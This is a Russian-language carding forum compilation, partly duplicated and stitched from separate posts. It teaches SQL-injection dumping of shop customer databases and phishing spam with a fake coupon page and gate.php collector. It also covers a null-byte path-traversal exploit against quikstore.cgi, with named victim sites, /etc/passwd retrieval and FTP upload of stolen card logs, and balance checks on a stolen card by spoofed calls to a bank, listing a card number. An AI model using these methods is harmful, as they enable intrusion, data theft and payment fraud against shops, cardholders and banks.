Вещевой кардинг сами добываем сс для вбивов. Бесплатный картон(необычный приватный мануал добычи СС) Добываем сс

Всё чаще и чаще я вижу сообщения о том что очень сложно найти нужный материал, что мат последнее время не надлежащего качества и тому подобные высказывания.
Добыча мата обычно происходит следующими способами:
1. Ботнет.
2. Взлом шопов, установка снифера.
3. Фейк шоп.
4. Уязвимости в ssl, добыча мата exploit-от.
5. Социальная инжинерия.

Сегодня мы разберём подробно 5-й и частично 3-й пункты.

1. Добыча базы жертв.
Заполучить базу SQLIDamper-ом очень просто, немного терпения и прямые руки в помощь. О дампере написано много статей на многих форумах поэтому я пробегусь поверхностно. Нам потребуется SQLIDamper и EasyDorkBuilder. Первым делом генерируй дорки.

На скрине показан примитивный пример, про ген. дорок тоже море статей)) Генерируй дорки, открывай созданный тхт в директории генератора. Копируй все дорки в дампер.


Не забудь дописать inurl: как на скрине, жми Start Scaner
Спустя некоторое время напарсится около нн-ое кол-во линков, переходи во вкладку Exploitables жми StartExploiter.
Начнут появляться потенциально уязвимые линки. Жди завершения сканирования!
Далее переходи во вкладку Injectables, жми StartAnalizer
В процессе скана будут появляться уязвимые сайты, обрати внимание на версию Mysql, чем версия ниже тем больше шансов слить базу.


Выбирай понравившийся линк, правой кнопкой мыши и жми Go to Dumper
Откроется дампер, и ты увидешь название базы данных. Жми Get_Tables
Если уязвимость сработала, ты увидешь список таблиц базы. интересует нас база юзеров сайта\шопа. Ищи глазами таблицы users, mails, orders и т.п.
Нашёл? отлично выбирай таблицу жми Get_Colums

Видим интересные колонки (см. скрин) Нас интересует в основном база мыл. Но это СИ бро, поэтому нистоит пренебрегать доп. инфой Имя, Фамилия, Адрес и т.п. Это может помоч составить граммотный спам! Также если есть логины и пассы в шоп тоже очень хорошо. Как правило они храняться в MD5 хеше. расшифровать не составит большого труда всю базу. Далее можно попробовать подобрать этот же пароль к мылу, к палке и т.п. Но не буду отходить от темы, продолжим.
Ставь галочки возле интересующих тебя колонок, жми Dump Data. В зависимости от кол-ва юзеров и скорости сервака где хоститься шоп время слития базы может затянуться на долго)))


Как видишь на скрине попалась довольно таки жирненькая базка
И так базу мы заимели что дальше?
____________________________________________________________________________________________________________________________
2. Спам.

Моей жертвой оказался этот шоп hyenacart.com
Переходим на главную и изучаем его, фантазируем, планируем, думаем как же заинтересовать жертву, и заставить выполнить нужные нам действия.
Как известно все очень любят халяву, подарки, скидки!
Готовим письмо.
Регистрируемся в шопе, чтобы получить от него письмо и увидеть дизайн. Либо сочиняем свой диз. Придумываем текст якобы мега крутой распродажи или раздачи бонусов. Гуглим визуальный редактор HTML, и сочиняем письмо.
У меня получилось как то так)


Жми кнопочку "Исходный код" копируй код письма.Пока сохрани код в тхт
Итак сам фейк будем спамить во вложении к письму под видом купона дабы избежать абуз на сервер на котором этот фейк бы хостился.
Поехали попорядку.
Для начала всё же потребуется простенький хостинг на который нужно залить gate.php
Этот скрипт будет принимать отчёт и отправлять его на емаил который нужно указать в коде.
А также линк куда отправить жертву после ввода инфы. Можно указать линк на шоп с которого слили базу.


Пробуй, тестируй, усовершенствуй схему. Можно добиться хорошего профита.
Если спамить 40-50к мыл в сутки, про покупку материала можно забыть) Многие начнут говорить сейчас за инбокс и т.п. поверте мне в слитых базах не только биги, на мелкие сервера sender2.php доставляет очень хорошо спам во входящие.

P.S. Статья всего лишь намёк, не судите строго за ошибки, всю схему нужно усовершенствовать и дотачивать, всё зависит от вашего подхода к теме!
База шопа ещё сливается, завтра соченю хорошее письмо и чёткий фейк, проспамлю чтобы вы увидели профит))))

Многие видят сообщения о том что очень сложно найти нужный материал, что мат последнее время не надлежащего качества и тому подобные высказывания.
Добыча мата обычно происходит следующими способами:
1. Ботнет.
2. Взлом шопов, установка снифера.
3. Фейк шоп.
4. Уязвимости в ssl, добыча мата exploit-от.
5. Социальная инжинерия.

Сегодня мы разберём подробно 5-й и частично 3-й пункты.

1. Добыча базы жертв.
Заполучить базу SQLIDamper-ом очень просто, немного терпения и прямые руки в помощь. О дампере написано много статей на многих форумах поэтому я пробегусь поверхностно. Нам потребуется SQLIDamper и EasyDorkBuilder. Первым делом генерируй дорки.

На скрине показан примитивный пример, про ген. дорок тоже море статей)) Генерируй дорки, открывай созданный тхт в директории генератора. Копируй все дорки в дампер.

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Не забудь дописать inurl: как на скрине, жми Start Scaner
Спустя некоторое время напарсится около нн-ое кол-во линков, переходи во вкладку Exploitables жми StartExploiter.
Начнут появляться потенциально уязвимые линки. Жди завершения сканирования!
Далее переходи во вкладку Injectables, жми StartAnalizer
В процессе скана будут появляться уязвимые сайты, обрати внимание на версию Mysql, чем версия ниже тем больше шансов слить базу.

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Выбирай понравившийся линк, правой кнопкой мыши и жми Go to Dumper
Откроется дампер, и ты увидешь название базы данных. Жми Get_Tables
Если уязвимость сработала, ты увидешь список таблиц базы. интересует нас база юзеров сайта\шопа. Ищи глазами таблицы users, mails, orders и т.п.
Нашёл? отлично выбирай таблицу жми Get_Colums

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Видим интересные колонки (см. скрин) Нас интересует в основном база мыл. Но это СИ бро, поэтому нистоит пренебрегать доп. инфой Имя, Фамилия, Адрес и т.п. Это может помоч составить граммотный спам! Также если есть логины и пассы в шоп тоже очень хорошо. Как правило они храняться в MD5 хеше. расшифровать не составит большого труда всю базу. Далее можно попробовать подобрать этот же пароль к мылу, к палке и т.п. Но не буду отходить от темы, продолжим.
Ставь галочки возле интересующих тебя колонок, жми Dump Data. В зависимости от кол-ва юзеров и скорости сервака где хоститься шоп время слития базы может затянуться на долго)))

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Как видишь на скрине попалась довольно таки жирненькая базка;)
И так базу мы заимели что дальше?
_______________________________________________________________________________________________________________________________________________________________

Моей жертвой оказался этот шоп hyenacart.com
Переходим на главную и изучаем его, фантазируем, планируем, думаем как же заинтересовать жертву, и заставить выполнить нужные нам действия.
Как известно все очень любят халяву, подарки, скидки!
Готовим письмо.
Регистрируемся в шопе, чтобы получить от него письмо и увидеть дизайн. Либо сочиняем свой диз. Придумываем текст якобы мега крутой распродажи или раздачи бонусов. Гуглим визуальный редактор HTML, и сочиняем письмо.
У меня получилось как то так)

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Жми кнопочку "Исходный код" копируй код письма.Пока сохрани код в тхт
Итак сам фейк будем спамить во вложении к письму под видом купона дабы избежать абуз на сервер на котором этот фейк бы хостился.
Поехали попорядку.
Для начала всё же потребуется простенький хостинг на который нужно залить gate.php
Этот скрипт будет принимать отчёт и отправлять его на емаил который нужно указать в коде.
А также линк куда отправить жертву после ввода инфы. Можно указать линк на шоп с которого слили базу.

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Вы должны быть зарегистрированы, чтобы видеть ссылки.

У меня получилось такой вот фейк.

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Осталось проспамить базу, и ждать профита.

Вы должны быть зарегистрированы, чтобы видеть ссылки.

Лежит архив со всеми скриптами и софтом, а также 2 скрипта и софтинка для рассылки спама.
Пробуй, тестируй, усовершенствуй схему. Можно добиться хорошего профита.
Если спамить 40-50к мыл в сутки, про покупку материала можно забыть) Многие начнут говорить сейчас за инбокс и т.п. поверте мне в слитых базах не только биги, на мелкие сервера sender2.php доставляет очень хорошо спам во входящие

Привет, господа хакеры, вот вам
продолжение серии моих статей "Как
поиметь кред", и, если все будет оки, то
буду писать стати на тему имения кред раз в
неделю. Ладно, не буду вас парить
такими темами, приступим сразу к делу.

Итак, что вам понадобится для взлома
веб шопа?
1 - компьютер и доступ в интернет
2 - чутка ума
3 - умение пользоваться поисковой
системой
4 - прочитать эту статью

Сегодня я буду вам рассказывать про
тактику взлома quikstore.cgi. Quikstore это
буржуйский веб шоп очень хорошего качества,
его долго делали и много народа старалось
над его разработкой, как обычно,
перестарались, допустив в нем очень
полезную для хакеров ошибку. Сколько не
говорили про ошибку в нулевом символе,
многие до сих пор ее не поняли. Итак, вот вам
пример уязвимости:

http://www.lockpickers.com/cgi-bin/ quikstore.cgi?page=../%00html&cart_id=

Набрав у себя в браузере этот адрес, вы
увидите, что-то типа

½Y. .8. ..ˆK.html½À©Y.
access.logÀ.Y.check_setup.cgi.
Y.email_addresses.log°Y. language.cfg.þÚ¾Y.
quikstore.cfg.Â.Y. quikstore.cgiþÚ.öG

Конечно, мусора много, но разобраться в
названиях можно. Посмотрев на всякие
названия, мы видим каталог orders, пора нам
в него зайти

http://www.lockpickers.com/cgi-bin/ quikstore.cgi?page=../orders/%00html&cart_id=

Ага, и мы видим:

H ..Y. ..(.H 599201.logА,.H
154519.logА-.H
985367.logА..H 865125.logА/.H 315856.logА0.H
937483.logА1.H 378887.logА2.H 169435.logА3.H
479192.logА4.H 257362.logА5.H 115183.logА6.H
11395.logА7.H 167788.logА8.H 559841.logА9.H
917539.logА:.H 354163.logА;.H 299892.logА<.H
280139.logА=.H5817.log.А>.H 350266.logА?.H
26773.logА@.H 360859.logАA.H 199829.logАB.H
832283.logАC.H 412408.logАD.H 508280.logАE.H
456098.logАF.H 126968.logАG.H 183660.logАH.H
569004.logАI.H 772139.logАJ.H 103115.logАK.H
654675.logАL.H 884681.logАM.H 638658.logАO.H
188875.logАP.H 225653.logАN.H 753313.logАQ.H
898714.logАR.H 188818.logАS.H 439711.logАT.H
927352.logАU.H 431996.logА..H 672967.logА..H
159103.logА..H 830744.logА).H 566537.logА*.H
253144.logА+.H 5138.log.А..H 663457.logА..H
586008.logА..H 997506.logА..H 856583.logА..H
693685.logА..H 655797.logА..H 814237.logА..H
882103.logА..H 443014.logА..H 380792.logА..H
368613.logА..H 914079.logА..H 773799.logА..H
267996.logА..H 57162.logА..H 882551.logА..H
259987.logА..H 312268.logА..H 994056.logА..H
281473.logА..H 726034.logА..H 566936.logА..H
558117.logА..H 317098.logА.H 238429.logА╝.H
63477.logА╬.H 802520.logА..H 938229.logА÷.H
351224.logА╫.H 390858.logА..H 735378.logА..H
221629.logАЁ.H 15072.logА©.H 90119.logА╢.H
823612.logА².H 347629.logА..H 891608.logА..H
514696.logА

Ага, много файлов с расширением.log, это и
есть на самом деле вожделенные сс!! Теперь
просто вводим имя файла в наш урл и видим
всю инфу о сс. Вот смотрите:
http://www.lockpickers.com/cgi-bin/ quikstore.cgi?page=../orders/898714.log%
00html&cart_id=

Но в формате, в котором все это выдается,
смотреть неудобно, поэтому мы
просматриваем исходники html странички и
видим все рассортированное в удобном
формате! Часто бывает такая фича, что нельзя
просматривать каталоги, а значит нельзя
увидеть номера файлов с кредами, чтобы их
просмотреть нужно попробовать сделать вот
как:

http://www.lockpickers.com/cgi-bin/
quikstore.cgi?page=../../../../../../../../ etc/passwd%00html&cart_id=

Ага что мы поимели?? А угадайте с 3-ех раз
:). Лана, для тех кто в бронетанке скажу,
что мы поимели пассы этого сервака. Теперь
просто кормим их john the ripper и ломимся через
шелл. Но сначала подбираем пасс от юзера,
которому разрешен шелл! А далее, найдя wwwroot и
зайдя там в каталог orders, мы командируем

ftp
потом пишем open www.may-ftp-server.com
user *****
pas *****
put *.log

Ага, порядок. Мы закачали все файлы с
расширением log к себе на фтп. Ессно с фтп мы
можем слить все, что угодно, к примеру,
какой-нибудь скрипт... Да, кстати, если вы
подберете пасс от рута, то вы можете рулить
серваком, как захотите (это для самых умных
сказано)!!!

Ну и напоследок пару ссылочек с дырами:
http://www.lockpickers.com/cgi-bin/quikstore.cgi?
page=../orders/898714.log%00html&cart_id=
http://www.sterlingjudaica.com/cgi-bin/quikstore.cgi?
page=../orders/%00html&cart_id=
http://www.doityourselfpestctrl.com/cgi-
bin/quikstore.cgi?page=../orders/%00html&cart_id=
http://www.wellmanandwelsch.com/cgibin/quikstore.cgi?
page=../orders%00html&cart_id=

И сразу тема как узнать баланс картона.
Способ подходит только для US карт.

Понадобится:

US CC
SSN (взавимости от банка)
Google Voice
Spooftel или SpoofCard аккаунт

Сам процесс:

1. Покупем CC / Пробиваем SSN
2. Узнаём номер банка
3. Прозваниваем банк

Покупем CC / Пробиваем SSN
Покупаем US CC в шопе, подойдут только с номером телефона холдера.
В моём случае это: 4744760081177217.
Надобность пробива SSN или остальной инфы - зависит от банка.

Узнаём номер банка
Идём на bins.pro, пробиваем банк-эмитент купленной CC.
В моём случае это: "BANK OF AMERICA, N.A."
Гуглим оф. сайт банка. М моём случае долго гуглить не пришлось

)

Ищём контакты:


Выбираем штат:


Выбираем причину по которой мы хотим связаться с банком:


Получаем номер:


Прозваниваем банк
Покупаем акк Google Voice (штат не важен).

Делаем акк на SpoofCard (лично я не каржу эту контору, пополняю баланс с BTC на 9.95$).
При регистрации указываем номер купленного google voice.
Получаем SMS от SpoofCard на Google Voice, активируем аккаунт, пополняем.

После добавления кредитов в SpoofCard, идём во вкладку "Place Your

"
В "Destination Number" - указываем номер банка
В "

er ID to Display" - номер холдера CC:


Жмём "Place Your

", получаем номер телефона на который будем звонить с Google Voice:


Открываем наш Google Voice, звоним по номеру выданному в SpoofCard, если просит вводим "access code", выданный на той-же странице.
Далее нас соединяет с банковским ботом, бот перечисляет перечень предоставляемой информации, в моём случае это "Accounts Information" под цифрой 4, набираем 4 на тачпаде.
Далее бот просит ввести последние 4 цифры с CC либо последние 4 цифры SSN.
Вводим - в ответ получаем баланс.
Не забываем пользоваться программами или сервисами подмены номера под КХ.
На днях нашел один интересный сервис который нам предлагает бесплатные звонки по такому плану:
В Америку, Канаду, SIPBroker и iNum - каждый звонок до 30 минут.
В страны Евразии на один уникальный номер в сутки до 30 секунд.
Звонки в Skype - длительность каждого звонка до 10 минут.
*Войдите на форум для просмотра ссылок. *
P.S.
Работает с многими банками, но есть исключения.